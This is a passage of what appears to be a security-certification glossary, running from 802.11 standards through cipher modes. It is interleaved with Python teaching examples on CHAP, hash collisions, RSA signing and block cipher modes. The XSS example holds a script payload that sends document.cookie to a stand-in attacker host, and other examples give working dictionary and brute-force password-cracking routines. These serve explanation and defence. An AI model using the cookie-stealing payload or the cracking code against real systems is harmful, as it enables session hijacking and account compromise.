Glossary

3DES See Triple DES.

6to4 An IPv4-to-IPv6 transition method that allows IPv6 sites to communicate with each other across an IPv4 network by encapsulating IPv6 packets inside IPv4 packets (IP protocol 41).

802.1X A standard that defines a framework for port-based network access control: a supplicant must authenticate (using EAP) to an authentication server through the switch or access point before the port will forward normal traffic.

802.11a An 802.11 standard that operates in the 5 GHz frequency band and, by using OFDM, supports speeds up to 54 Mbps.

802.11ac An 802.11 standard that builds on the concepts introduced with 802.11n. It operates only in the 5 GHz band and widens the channel from 40 MHz to 80 MHz (160 MHz optional).

802.11b An 802.11 standard that operates in the 2.4 GHz frequency band at speeds up to 11 Mbps.

802.11e An IEEE standard created to provide QoS for packets when they traverse a wireless segment.

802.11f A former 802.11 recommended practice (the Inter-Access Point Protocol, IAPP, since withdrawn) that addressed the delay introduced when a wireless client roams from one AP to another and must re-authenticate with the new AP, a delay that in some cases broke application connections. It improved the sharing of authentication information between APs.

802.11g An 802.11 standard that operates in the 2.4 GHz frequency band at speeds up to 54 Mbps by using OFDM.

802.11n An 802.11 standard that uses several new techniques to reach data rates up to 600 Mbps: channels that are 40 MHz wide and multiple antennas that allow up to four simultaneous spatial streams (a feature called Multiple Input Multiple Output [MIMO]). It can operate in both the 2.4 GHz and 5 GHz bands.

acceptability The likelihood that users will accept and consistently follow a system or control; a control that users work around provides little real protection.

acceptance testing Testing that verifies a system meets its agreed requirements and will be accepted by its end users.

access control list (ACL) A list of permissions attached to an object, including files, folders, servers, routers, and so on. Such rule sets can be implemented on firewalls, switches, and other infrastructure devices to control access.

access control policy A defined method for identifying and authenticating users and the level of access that is granted to the users.

access point (AP) A wireless transmitter and receiver that hooks into the wired portion of the network and provides an access point to the network for wireless devices.

accuracy The most important characteristic of biometric systems, which indicates how correct the overall readings will be.

ACL See access control list.

Active Directory (AD) Microsoft's directory service, which organizes objects such as users, computers, and groups into domains, trees, and forests. AD is used to manage and organize the resources in an organization, and much of its security configuration is applied efficiently through Group Policy.

active fingerprinting Fingerprinting tools that transmit packets to remote hosts and analyze the replies for clues about the replying system.

ActiveX A Microsoft technology, now deprecated, that uses object-oriented programming (OOP) and is based on COM and DCOM. ActiveX controls ran with the full privileges of the browser user, which made them a frequent attack vector.

ad hoc mode An 802.11 mode in which there is no AP, and the stations communicate directly with one another.

administrative control A security control that is implemented to administer an organization’s assets and personnel and includes security policies, procedures, standards, and guidelines that are established by management.

advanced persistent threat (APT) A targeted, sustained intrusion campaign, usually by a well-resourced adversary, that focuses on a specific entity and is carried out covertly over a long period of time.

advisory security policy A security policy that provides instruction on acceptable and unacceptable activities.

agile model A development model that emphasizes continuous feedback and cross-functional teamwork.

ALE See annualized loss expectancy.

algorithm A mathematical function that encrypts and decrypts data. Also referred to as a cipher.

annualized loss expectancy (ALE) The expected monetary loss from a given threat per year. The equation used is ALE = SLE × ARO, where the single loss expectancy (SLE) is asset value × exposure factor.

annualized rate of occurrence (ARO) The estimate of how often a given threat might occur annually.

application-level proxy A proxy that operates at the application layer (layer 7) and understands the protocol it relays, so it can inspect and filter on content rather than only on addresses and ports.

APT See advanced persistent threat.

ARO See annualized rate of occurrence.

asset Any object that is of value to an organization. This includes personnel, facilities, devices, and so on.

asset value The estimated value of an asset, used in the calculation of single loss expectancy.

asymmetric encryption An encryption method whereby a key pair, one private key and one public key, performs encryption and decryption. One key performs the encryption, whereas the other key performs the decryption. Also referred to as public key encryption.

asynchronous encryption A type of encryption in which encryption and decryption requests are processed from a queue.

Asynchronous JavaScript and XML (AJAX) A group of interrelated web development techniques used on the client side to create asynchronous web applications.

asynchronous replication A method that provides delayed replication but uses less bandwidth than synchronous replication, can survive higher latency, and is usually used across long distances.

attestation A process by which a platform proves its current state (for example, a TPM-signed report of boot measurements) to an authorized party, so that changes to a user's computer can be detected.

attestation identity key (AIK) An asymmetric key pair held in TPM versatile memory and created under the endorsement key (EK). The TPM uses AIKs to sign attestation data such as PCR values, so that the EK itself is never used directly for remote attestation.

AV See asset value.

availability A value that describes what percentage of the time a resource or data is available. The tenet of the CIA triad that ensures that data is accessible when and where it is needed.

authentication The act of validating a user with a unique identifier by providing the appropriate credentials.

authentication header (AH) An IPsec component that provides data integrity, data origin authentication, and protection from replay attacks.

authorization The point after identification and authentication, at which a user is granted the rights and permissions to resources.

BACnet (Building Automation and Control Networks) A protocol used by building automation systems such as HVAC, lighting, and physical access control. The base protocol has no built-in authentication, so BACnet devices should be kept on a segregated network.

baseline An information security governance component that acts as a reference point that is defined and captured to be used as a future reference. Both security and performance baselines are used.

bastion host A host that may or may not be a firewall. The term refers to the position of the device: any system exposed directly to the Internet or to another untrusted network is a bastion host, and it should be hardened accordingly, with unnecessary services removed.

benchmark An information security governance component that captures the same data as a baseline and can even be used as a new baseline should the need arise. A benchmark is compared to the baseline to determine whether any security or performance issues exist.

BIA See business impact analysis.

BitLocker Full disk encryption included with Windows Vista/7 Ultimate and Enterprise, Windows 8/8.1 Pro and Enterprise, Windows 10/11 Pro and Enterprise, and Windows Server 2008 and later.

black-box testing Testing in which the team is provided with no knowledge regarding the organization’s network.

black hat An entity with malicious intent that breaks into an organization’s system(s).

blind test A test in which the testing team is provided with limited knowledge (publicly available information) of the network systems and devices.

block cipher A cipher that performs encryption by breaking a message into fixed length units.

block encryption Encryption of a disk partition, or a file that is acting as a virtual partition. Also sometimes used as a synonym for disk encryption.

Blowfish A block cipher that uses 64-bit data blocks using anywhere from 32- to 448-bit encryption keys. Blowfish performs 16 rounds of transformation.

Bluejacking An attack in which unsolicited messages are sent to a Bluetooth-enabled device, often for the purpose of adding a business card to the victim’s contact list.

Bluesnarfing Unauthorized access to a device using a Bluetooth connection. The attacker tries to access information on the device rather than send messages to the device.

Bluetooth A wireless technology that is used to create personal area networks (PANs) in the 2.4 GHz frequency.

bring your own device (BYOD) An initiative undertaken by many organizations to allow the secure use of personal devices on a corporate network.

browser extensions or add-ons Small programs or scripts that extend the functionality of the browser itself; because they run inside the browser, they inherit its access to every site the user visits.

brute-force attack A password or key attack that systematically tries every possible combination of characters (or every key in the keyspace) until the correct one is found.

buffer overflow Behavior that occurs when more data is written to a buffer than was allocated for it, so that adjacent memory is overwritten. Exploitable to corrupt control data and execute attacker-supplied code.

build-and-fix approach A method of developing software as quickly as possible and releasing it right away. This method, which was used in the past, has been largely discredited and is now used as a template for how not to manage a development project.

Build Security In (BSI) An initiative that promotes a process-agnostic approach that makes security recommendations with regard to architectures, testing methods, code reviews, and management processes.

business impact analysis (BIA) A functional analysis that occurs as part of business continuity and disaster recovery and lists the critical and necessary business functions, their resource dependencies, and their level of criticality to the overall organization.

business partnership agreement (BPA) An agreement between two business partners that establishes the conditions of the partner relationship.

BYOD See bring your own device.

CA See certification authority.

Capability Maturity Model Integration (CMMI) A process improvement approach that addresses three areas of interest: product and service development (CMMI for Development), service establishment and management (CMMI for Services), and product and service acquisition (CMMI for Acquisition).

CAST-128 A block cipher that uses a 40- to 128-bit key that will perform 12 or 16 rounds of transformation on 64-bit blocks.

CAST-256 A block cipher that uses a 128-, 160-, 192-, 224-, or 256-bit key that will perform 48 rounds of transformation on 128-bit blocks.

CBC See cipher block chaining.

CBC-MAC See cipher block chaining MAC.

CEO See chief executive officer.

CERT See Computer Emergency Response Team.

certificate revocation list (CRL) A list of digital certificates that a CA has revoked.

certification authority (CA) An entity that creates and signs digital certificates, maintains the certificates, and revokes them when necessary.

CFB See cipher feedback.

CFO See chief financial officer.

chain of custody A series of documents that shows who controlled the evidence, who secured the evidence, and who obtained the evidence.

Challenge Handshake Authentication Protocol (CHAP) An authentication protocol that solves the clear-text password problem by never sending the credentials across the link. The authenticator sends a random challenge; the peer replies with a hash (MD5 in RFC 1994) of the packet identifier, the shared secret, and the challenge, and the authenticator compares that with its own computation. Challenges can be repeated during the session to re-verify the peer.
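
The exchange described in this entry, as an added example that is not part of the original glossary: a Python simulation of the CHAP challenge/response from RFC 1994. The user name, shared secret and the Authenticator class are constructed for the demo; real CHAP runs inside PPP.

```python
import hashlib
import hmac
import os

# Added example: a CHAP (RFC 1994) exchange between an authenticator and a
# peer. The shared secret never crosses the link; only a random challenge,
# an identifier byte and an MD5 response do.

SHARED_SECRET = b"correct horse battery staple"   # constructed demo secret


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """Peer side: Response = MD5(Identifier || secret || Challenge)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class Authenticator:
    """Server side: issues challenges and verifies responses (constructed)."""

    def __init__(self, secrets: dict):
        self.secrets = secrets              # user name -> shared secret
        self.identifier = 0
        self.outstanding = {}               # identifier -> challenge value

    def challenge(self):
        self.identifier = (self.identifier + 1) & 0xFF
        chal = os.urandom(16)               # fresh random value every time
        self.outstanding[self.identifier] = chal
        return self.identifier, chal

    def verify(self, identifier: int, name: str, response: bytes) -> bool:
        # Each challenge is single-use, so a captured response cannot be replayed.
        chal = self.outstanding.pop(identifier, None)
        secret = self.secrets.get(name)
        if chal is None or secret is None:
            return False
        expected = chap_response(identifier, secret, chal)
        return hmac.compare_digest(expected, response)


def run_exchange(secret_on_peer: bytes) -> bool:
    """One full exchange; returns whether the authenticator accepted the peer."""
    auth = Authenticator({"alice": SHARED_SECRET})
    ident, chal = auth.challenge()                           # 1. Challenge
    response = chap_response(ident, secret_on_peer, chal)    # 2. Response
    return auth.verify(ident, "alice", response)             # 3. Success/Failure


def replay_is_rejected() -> bool:
    """Re-sending a valid response against the same identifier must fail."""
    auth = Authenticator({"alice": SHARED_SECRET})
    ident, chal = auth.challenge()
    resp = chap_response(ident, SHARED_SECRET, chal)
    return auth.verify(ident, "alice", resp) and not auth.verify(ident, "alice", resp)
```

Two caveats a deployment should weigh: the authenticator must hold the secret itself (not a salted hash) to compute the expected response, so its secrets store is a high-value target, and anyone who captures a challenge and its response can run an offline dictionary attack against the secret.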

checksum See hash.

chief executive officer (CEO) The highest managing officer in an organization, who reports directly to the shareholders.

chief financial officer (CFO) The officer responsible for all financial aspects of an organization.

chief information officer (CIO) The officer responsible for all information systems and technology used in the organization and who reports directly to the CEO or CFO.

chief privacy officer (CPO) The officer responsible for private information, who usually reports directly to the CIO.

chief security officer (CSO) The officer who leads any security effort and reports directly to the CEO.

CIA triad The three goals of security, that is, confidentiality, integrity and availability.

CIO See chief information officer.

cipher See algorithm.

cipher block chaining (CBC) A block cipher mode (originally defined for DES) in which the blocks are chained: each plaintext block is XORed with the previous ciphertext block before it is encrypted. Plaintext block 1 is XORed with an initialization vector (IV) and encrypted; the resulting ciphertext block 1 is XORed with plaintext block 2, which is then encrypted to produce ciphertext block 2, and so on until the message is complete. The IV must be unpredictable for each message.

cipher block chaining MAC (CBC-MAC) A message authentication code built by running a block cipher in CBC mode with a zero IV and keeping only the final ciphertext block as the tag. It is secure only for fixed-length messages; CMAC extends it to variable-length messages.

cipher feedback (CFB) A block cipher mode (originally defined for DES) that turns the block cipher into a self-synchronizing stream cipher and can work on segments as small as 8 bits (or even 1 bit). The IV is encrypted with the key to produce keystream bits, which are XORed with the first plaintext segment; the resulting ciphertext segment is shifted into the input register and encrypted to produce the keystream for the next segment.

ciphertext An altered form of a message that is unreadable without knowing the key and the encryption system used. Also referred to as a cryptogram.

circuit-level proxies Proxies that operate at the session layer (layer 5) of the OSI model.

clandestine Information hidden from certain individuals or groups, perhaps while being shared with other individuals.

cleanroom model A development model that strictly adheres to formal steps and a more structured method. It attempts to prevent errors and mistakes through extensive testing.

cleartext See plaintext.

click-jacking An attack that overlays a transparent page or frame on top of a legitimate-looking page so that when the user clicks on something, the click actually goes to a different URL or control. In some cases the attacker entices the user to enter credentials that the attacker can use later.

client-based application virtualization Virtualization in which the target application is packaged and streamed to the client.

client-side attack An attack that targets vulnerabilities in the client's applications (browser, document reader, mail client) that interact with a server, typically one the attacker controls. It can occur only if the client connects to that server or opens the malicious content.

clipping level A configured baseline threshold above which violations will be recorded.

cloud antivirus products Antivirus software that does not run on a local computer but that runs in the cloud, creating a smaller footprint on the client.

cloud-based collaboration A means of collaboration used by enterprises and small teams for storing documents, communicating, and sharing updates on projects.

cloud computing Computing in which resources are available in a web-based data center so the resources can be accessed from anywhere.

cloud storage Storage in which the data is located on a central server and is accessible from anywhere and, in many cases, from a variety of device types.

clustering Grouping multiple servers running the same application and data set so that they act as one system, providing load balancing and failover.

COBIT See Control Objectives for Information and Related Technology.

Code Division Multiple Access (CDMA) A transmission sharing process that assigns a unique code to each call or transmission and spreads the data across the spectrum, allowing a call to make use of all frequencies.

code review The systematic investigation of code for security and functional problems.

cognitive password A password type that is a piece of information that can be used to verify an individual’s identity. This information is provided to the system by answering a series of questions based on the user’s life, such as favorite color, pet’s name, mother’s maiden name, and so on.

collision An event that occurs when a hash function produces the same hash value on different messages.
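
The birthday-style search behind this definition, as an added example that is not part of the original glossary. It deliberately truncates SHA-256 to a small number of bits so a collision is reachable in milliseconds; the message labels are constructed.

```python
import hashlib
import itertools

# Added example: colliding a hash that has been truncated to `bits` bits.
# The birthday bound says roughly 2**(bits/2) inputs suffice, which is why
# short (or truncated) digests offer far less collision resistance than
# their length suggests.

def truncated_hash(data: bytes, bits: int) -> int:
    """First `bits` bits of SHA-256, as an integer (the constructed weakness)."""
    full = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return full >> (256 - bits)


def find_collision(bits: int):
    """Birthday search: hash distinct messages until two share a value.
    Returns (m1, m2, attempts) with m1 != m2 and equal truncated hashes."""
    seen = {}
    for i in itertools.count():
        msg = b"msg-%d" % i              # constructed, distinct inputs
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg


def expected_attempts(bits: int) -> float:
    """Birthday estimate: about sqrt(pi/2 * 2**bits) inputs until a collision."""
    return (3.141592653589793 / 2 * 2 ** bits) ** 0.5
```

For a 24-bit truncation the search finishes after a few thousand hashes, close to expected_attempts(24); doubling the bit length only multiplies the work by about 1.4, so the figure that matters for collision resistance is half the digest length, which is why 128-bit digests such as MD5 were considered marginal even before their structural breaks.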

collusion Occurs when two employees work together to accomplish a theft of some sort that could not be accomplished without their combined knowledge or responsibilities.

combination password A password type that uses a mix of dictionary words, usually two unrelated words.

commissioning The process of implementing an asset on an enterprise network.

Committee of Sponsoring Organizations (COSO) of the Treadway Commission Framework A corporate governance framework that consists of five interrelated components: control environment, risk assessment, control activities, information and communication, and monitoring.

Common Internet File System (CIFS) A method for accessing files in Windows networks. CIFS is the dialect of Server Message Block (SMB) that Microsoft documented publicly; modern Windows uses SMB 2 and 3.

community cloud A cloud computing model where the cloud infrastructure is shared among several organizations from a specific group with common computing needs.

compensative control A security control that substitutes for a primary access control and mainly acts as a mitigation to risks.

complex password A password type that forces a user to include a mixture of upper- and lowercase letters, numbers, and special characters.

Computer Emergency Response Team (CERT) An organization that studies security vulnerabilities and provides assistance to organizations that become victims of attacks. Part of the Software Engineering Institute at Carnegie Mellon University in Pittsburgh, PA, the CERT Coordination Center (CERT/CC) offers an emergency response service and shares information for improving Internet security.

computer surveillance Capture and reporting of a person’s actions using digital information, such as audit logs.

Configuration Lockdown A setting that can be configured on a variety of devices once the device is correctly configured. It prevents any changes to the configuration.

concealment cipher A cipher that intersperses plaintext somewhere within other written material. Also referred to as a null cipher.

confidentiality The tenet of the CIA triad which ensures that data is protected from unauthorized disclosure.

confusion A property of a cipher (due to Shannon) in which the relationship between the key and the ciphertext is made as complex as possible, so that each ciphertext bit depends on several parts of the key. Confusion is typically provided by substitution (S-boxes).

container-based virtualization A type of server virtualization in which the kernel allows for multiple isolated user-space instances. Also called operating system virtualization.

content analysis Analysis of the contents of a drive or software. Drive content analysis gives a report detailing the types of data by percentage. Software content analysis determines the purpose of the software.

continuity of operations plan (COOP) A business continuity document that considers all aspects that are affected by a disaster, including functions, systems, personnel, and facilities and that lists and prioritizes the services that are needed, particularly the telecommunications and IT functions.

Control Objectives for Information and Related Technology (COBIT) A security controls development framework that uses a process model to subdivide IT into four domains: Plan and Organize (PO), Acquire and Implement (AI), Deliver and Support (DS), and Monitor and Evaluate (ME).

control plane A component of a router that carries signaling traffic originating from or destined for a router. This is the information that allows the routers to share information and build routing tables.

cookies Small pieces of data that a web server sends to the browser, which stores them and returns them with subsequent requests to that site. They are used for session tracking and to remember user state, including browsing and shopping information, which is why session cookies should carry the Secure and HttpOnly attributes.

copy backup A backup that backs up all the files, much like a full backup, but does not reset the file’s archive bit.

corrective control A security control that reduces the effect of an attack or other undesirable event.

cost/benefit analysis A type of analysis that compares the costs of deploying a particular solution to the benefits that will be gained from its deployment. See also return on investment and total cost of ownership.

countermeasure A control that is implemented to reduce potential risk.

counter mode (CTR) A block cipher mode similar to OFB that encrypts an incrementing counter (combined with a nonce) to produce a unique keystream block for each plaintext block. Because no ciphertext is chained into the encryption of the next block, blocks can be encrypted in parallel and accessed randomly, so CTR performance is much better than that of the chaining modes. A nonce/counter value must never be reused under the same key.

covert Concealed or secret.

CPO See chief privacy officer.

CRL See certificate revocation list.

cross-certification Certification topology that establishes trust relationships between CAs so that the participating CAs can rely on the other participants’ digital certificates and public keys.

crossover error rate (CER) The point at which FRR equals FAR. Expressed as a percentage, this is the most important metric.

cross-site request forgery (CSRF) An attack that causes an end user to execute unwanted actions on a web application in which he or she is currently authenticated.

cross-site scripting (XSS) A web attack in which attacker-supplied input is returned in a page without proper output encoding, so that instead of being rendered as text it is executed by the victim's browser as script in the context of the site (stealing session cookies, for example).
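
The two weaknesses described in the CSRF and XSS entries, side by side with their fixes, as an added example that is not part of the original glossary. The request objects are constructed dicts (a session cookie plus form fields) rather than a real web framework, and the attacker host in PAYLOAD is a placeholder.

```python
import hmac
import html
import secrets

# Added example: a minimal comment-form handler written first with the two
# weaknesses the CSRF and XSS entries describe, then hardened. Requests are
# constructed dicts, not a real framework; attacker.example is a placeholder.

PAYLOAD = '<script>location="https://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(comment: str) -> str:
    """XSS: user input is concatenated into HTML without output encoding."""
    return "<p>" + comment + "</p>"


def render_hardened(comment: str) -> str:
    """Output encoding turns markup characters into entities, so the browser
    displays the text instead of executing it."""
    return "<p>" + html.escape(comment, quote=True) + "</p>"


class SessionStore:
    """Per-session anti-CSRF tokens (constructed stand-in for a framework)."""

    def __init__(self):
        self.tokens = {}                   # session id -> token

    def issue_token(self, session_id: str) -> str:
        token = secrets.token_urlsafe(32)  # unguessable, tied to the session
        self.tokens[session_id] = token
        return token                       # goes into a hidden form field

    def check_token(self, session_id: str, presented) -> bool:
        expected = self.tokens.get(session_id)
        if expected is None or not isinstance(presented, str):
            return False
        return hmac.compare_digest(expected, presented)


def post_comment_vulnerable(store: SessionStore, request: dict) -> str:
    """CSRF: any POST carrying the session cookie is accepted, so a form
    auto-submitted from an attacker's page is indistinguishable from the
    user's own; the browser attaches the cookie either way."""
    return render_vulnerable(request["form"]["comment"])


def post_comment_hardened(store: SessionStore, request: dict):
    """Requires a valid per-session token that a cross-site page cannot read;
    returns None where a real handler would send HTTP 403."""
    if not store.check_token(request["cookie"], request["form"].get("csrf")):
        return None
    return render_hardened(request["form"]["comment"])
```

html.escape covers text placed between tags and inside quoted attributes; input placed in a script block, a URL or a CSS context needs that context's own encoding. The CSRF check works because the token is delivered only to the legitimate page, which the same-origin policy keeps an attacker's page from reading; setting the session cookie's SameSite attribute is a complementary defence.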

cryptography A science that either hides data or makes data unreadable by transforming it.

cryptosystem The entire cryptographic process, including the algorithm, key, and key management functions. The security of a cryptosystem depends on the strength of the algorithm, the size of the keyspace relative to available computational power, and how well the keys are protected.

CSO See chief security officer.

CTR See counter mode.

daily backup A backup in which a file’s timestamp is used to determine whether it needs to be archived.

data aggregation A process that allows data from the multiple resources to be queried and compiled together into a summary report.

data archiving The process of identifying old or inactive data and relocating it to specialized long-term archival storage systems.

data clearing A sanitization process that renders information unrecoverable by a keyboard attack, that is, an attempt to extract data from storage media using software utilities, keystrokes, or other system resources available from a keyboard. Cleared media may still be recoverable with laboratory (forensic) techniques; see data purging.

data breach An incident in which information that is considered private or confidential is released to unauthorized parties.

data interfaces Network interfaces used to pass regular data traffic and not used for either local or remote management.

data isolation In terms of databases, preventing data from being corrupted by two concurrent operations. In terms of cloud computing, ensuring that tenant data in a multi-tenant solution is isolated from other tenants’ data, using a tenant ID in the data labels.

data leakage A leak that occurs when sensitive data is disclosed to unauthorized personnel either intentionally or inadvertently.

data loss prevention (DLP) software Software that attempts to prevent disclosure of sensitive data.

data plane The plane on a networking device such as a router or switch that carries user traffic. Also known as the forwarding plane.

data purging Using a method such as degaussing to make old data unavailable even with forensics. Purging renders information unrecoverable against laboratory attacks (forensics).

data remnant The residual information left on a drive after a delete process or the data left in terminated virtual machines.

data retention policy A security policy that stipulates how long data is retained by the organization, based on the data type.

data warehousing The process of combining data from multiple databases or data sources in a central location called a warehouse.

database access monitors (DAMs) Devices that monitor transactions and the activity of database services.

database administrator A person who is responsible for managing organizational databases that store valuable information, including financial, personnel, inventory, and customer information.

de facto standards Standards that are widely accepted but are not formally adopted.

de jure standards Standards that are formally adopted by a recognized standards body or mandated by laws or regulations.

decommissioning The process of retiring an asset from use on an enterprise network.

decryption The process of converting data from ciphertext to plaintext. Also referred to as deciphering.

deduplication A process provided by many storage solutions of searching through data and removing redundant copies of the same file.

definition files The files that make it possible for software to identify the latest viruses.

degaussing The act of exposing media to a powerful, alternating magnetic field.

demilitarized zone (DMZ) A perimeter network where resources are exposed to the Internet while being logically separated from the internal network.

Department of Defense Architecture Framework (DoDAF) An architecture framework that divides information into seven viewpoints: Strategic Viewpoint (StV), Operational Viewpoint (OV), Service-Oriented Viewpoint (SOV), Systems Viewpoint (SV), Acquisition Viewpoint (AcV), Technical Viewpoint (TV), and All Viewpoint (AV).

deperimeterization Changing the network boundary to include devices normally considered to be outside the network's perimeter.

DES See Data Encryption Standard.

DES-X A variant of DES that adds two 64-bit whitening keys to the 56-bit DES key. The first 64-bit key is XORed with the plaintext, the result is encrypted with DES, and the second 64-bit key is XORed with the resulting ciphertext. This raises the cost of exhaustive key search without changing the DES core.

desktop sharing Describes a group of related technologies that allow for both remote login to a computer and real-time collaboration on the desktop of a remote user.

detective control A security control that detects an attack while it is occurring to alert appropriate personnel.

deterrent control A security control that deters potential attacks.

dictionary attack An attack in which the attackers use a dictionary of common words to discover passwords.
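
The brute-force and dictionary attacks defined above, run offline against a salted SHA-256 password hash, as an added example that is not part of the original glossary. The wordlist, salt, and target passwords are constructed for the demo.

```python
import hashlib
import itertools
import string

# Added example: a dictionary attack and a brute-force attack run offline
# against a salted SHA-256 password hash. The wordlist, salt and target
# passwords are constructed for the demo; real attacks use far larger
# wordlists, rule-based mangling and GPU crackers.

WORDLIST = ["123456", "password", "letmein", "qwerty", "dragon", "baseball"]


def pw_hash(salt: bytes, password: str) -> str:
    """Fast salted SHA-256 as a stand-in for a weak password store; a real
    store should use a slow KDF such as bcrypt, scrypt or Argon2."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def dictionary_attack(salt: bytes, target_hex: str, words=WORDLIST):
    """Try each wordlist entry plus a few common mangling rules."""
    for word in words:
        for cand in (word, word.capitalize(), word + "1", word + "!"):
            if pw_hash(salt, cand) == target_hex:
                return cand
    return None


def brute_force(salt: bytes, target_hex: str,
                alphabet: str = string.ascii_lowercase + string.digits,
                max_len: int = 4):
    """Exhaustively try every string over `alphabet` up to `max_len`.
    Returns (password, attempts) or (None, attempts) if not found."""
    attempts = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            attempts += 1
            cand = "".join(combo)
            if pw_hash(salt, cand) == target_hex:
                return cand, attempts
    return None, attempts


def keyspace_size(alphabet_len: int, max_len: int) -> int:
    """Worst-case number of candidates for brute force: sum of alphabet_len**n."""
    return sum(alphabet_len ** n for n in range(1, max_len + 1))
```

The dictionary attack finds common passwords in a handful of hashes while brute force grows as keyspace_size shows (about 1.7 million candidates for four lowercase-or-digit characters, and roughly 36 times more per extra character). The defences follow directly: a per-user salt prevents one pass from cracking every account at once, a slow KDF multiplies each guess's cost, and rate limiting or lockout keeps the online variant from being feasible at all.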

differential backup A backup in which all files that have been changed since the last full backup are backed up, and the archive bit for each file is not cleared.

diffusion A property of a cipher (due to Shannon) in which each plaintext bit influences many ciphertext bits, so that statistical structure in the plaintext is spread across the ciphertext. Diffusion is typically provided by transposition (permutation).

digital certificate An electronic document that identifies the certificate holder.

Data Encryption Standard (DES) A symmetric block algorithm that uses a 64-bit key, 8 bits of which are used for parity, giving an effective key length of 56 bits. DES divides the message into 64-bit blocks and applies 16 Feistel rounds of substitution and permutation to each block, producing a 64-bit block of ciphertext. The 56-bit key is far too short for modern use; see Triple DES.

digital rights management (DRM) An access control method used by hardware manufacturers, publishers, copyright holders, and individuals to control the use of digital content.

digital signature A method of providing sender authentication, message integrity, and non-repudiation. The message is input to a hash function, and the sender's private key is used to sign (in RSA terms, encrypt) the hash value. The receiver hashes the received message, recovers the sender's hash from the signature using the sender's public key, and compares the two; a match shows that the message is unaltered and came from the holder of the private key.
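
The hash-then-sign flow from this entry, carried through with textbook RSA on deliberately small, constructed primes so that every step is visible. This is an added example, not part of the original glossary; the key sizes and the modulo-n reduction of the digest are demo simplifications, as explained after the code.

```python
import hashlib

# Added example: the hash-then-sign flow from the digital signature entry,
# using textbook RSA on deliberately small, constructed primes so every step
# is visible. Real deployments use 2048-bit or larger keys and a padding
# scheme (RSASSA-PSS or PKCS#1 v1.5); raw RSA without padding is not secure.

def keygen(p: int, q: int, e: int = 65537):
    """Return (public_key, private_key) as ((n, e), (n, d))."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)                 # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def message_digest(msg: bytes, n: int) -> int:
    """Hash the message; reduced mod n only so it fits the toy modulus."""
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % n


def sign(private_key, msg: bytes) -> int:
    """Sender: 'encrypt' the hash with the private key."""
    n, d = private_key
    return pow(message_digest(msg, n), d, n)


def verify(public_key, msg: bytes, signature: int) -> bool:
    """Receiver: recover the hash with the public key, recompute it, compare."""
    n, e = public_key
    return pow(signature, e, n) == message_digest(msg, n)


# Constructed toy key: these primes are far too small for real use.
PUBLIC_KEY, PRIVATE_KEY = keygen(104729, 1299709)
```

Altering a single character of the message, or a single bit of the signature, makes verify return False. The reduction mod n in message_digest exists only because the toy modulus is smaller than a SHA-256 digest; it is not a substitute for a padding scheme. With a proper key size the digest is embedded in a structured block (PSS, or the PKCS#1 v1.5 DigestInfo encoding), which also closes the forgeries that raw RSA's malleability allows.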

directive control A security control that specifies an acceptable practice in an organization.

Digital Signature Standard (DSS) The U.S. federal standard (FIPS 186) that governs the Digital Signature Algorithm (DSA) and also approves RSA and ECDSA signatures.

Direct Sequence Spread Spectrum (DSSS) One of two technologies (along with FHSS) that were a part of the original 802.11 standard. DSSS is the modulation technique used in 802.11b.

disk imaging A drive duplication process that creates an exact image of the contents of a hard drive.

disk-level encryption Encryption of an entire volume or an entire disk, which may use the same key for the entire disk or in some cases a different key for each partition or volume.

double-blind test A blind test in which the organization’s security team does not know that an attack is coming.

Double-DES A DES variant that applies DES twice with two different keys, for a nominal 112-bit key length. A meet-in-the-middle attack reduces its effective strength to roughly 57 bits, which is why Triple DES is used instead.

downstream liability Liability that an organization accrues due to partnerships with other organizations and customers.

DRM See digital rights management.

DSS See Digital Signature Standard.

dual-homed firewall A firewall that has two network interfaces, one pointing to the internal network and another connected to an untrusted network.

Dual Stack An IPv4-to-IPv6 transition method that runs both IPv4 and IPv6 on networking devices.

due care Actions exhibited when an organization takes all the actions it can reasonably take to prevent security issues or to mitigate damage if security breaches occur.

due diligence Actions which ensure that an organization understands the security risks it faces.

dumpster diving Examining garbage contents to obtain confidential information, including personnel information, account login information, network diagrams, and organizational financial data.

dynamic disk pools Disk technology that uses an algorithm to define which drives are used and distributes data and capacity accordingly.

ECB See electronic code book.

e-discovery The identification, preservation, collection, and production of electronically stored information as evidence for legal proceedings.

EF See exposure factor.

EFS See Encrypting File System.

electronic code book (ECB) A block cipher mode (originally defined for DES) in which each 64-bit block of data is processed by the algorithm independently using the same key; the plaintext is padded so that it divides into whole blocks. Because identical plaintext blocks produce identical ciphertext blocks, patterns in the data leak through, and ECB should not be used for anything longer than a single block.
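
The four modes defined in the cipher block chaining, cipher feedback, counter mode, and electronic code book entries, plus CBC-MAC, as one added example that is not part of the original glossary. The block cipher underneath is a constructed 64-bit, 16-round Feistel network with a SHA-256 round function (not DES, which Python's standard library does not provide); the keys, IVs, and the nonce layout are assumptions for the demo.

```python
import hashlib

# Added example: the ECB, CBC, CFB and CTR modes and CBC-MAC from the glossary
# entries, built on a constructed 64-bit, 16-round Feistel block cipher so the
# whole thing runs offline. The round function is SHA-256 based and is not
# DES; only the block structure and the mode logic mirror the definitions.

BLOCK = 8  # block size in bytes (64 bits, like DES)


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _subkeys(key: bytes):
    return [hashlib.sha256(key + bytes([i])).digest()[:8] for i in range(16)]


def _round(right: bytes, subkey: bytes) -> bytes:
    return hashlib.sha256(subkey + right).digest()[:4]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:4], block[4:]
    for k in _subkeys(key):                       # 16 Feistel rounds
        left, right = right, _xor(left, _round(right, k))
    return right + left                           # undo the final swap


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:4], block[4:]
    for k in reversed(_subkeys(key)):             # same rounds, keys reversed
        left, right = right, _xor(left, _round(right, k))
    return right + left


def pad(data: bytes) -> bytes:                    # PKCS#7 padding
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
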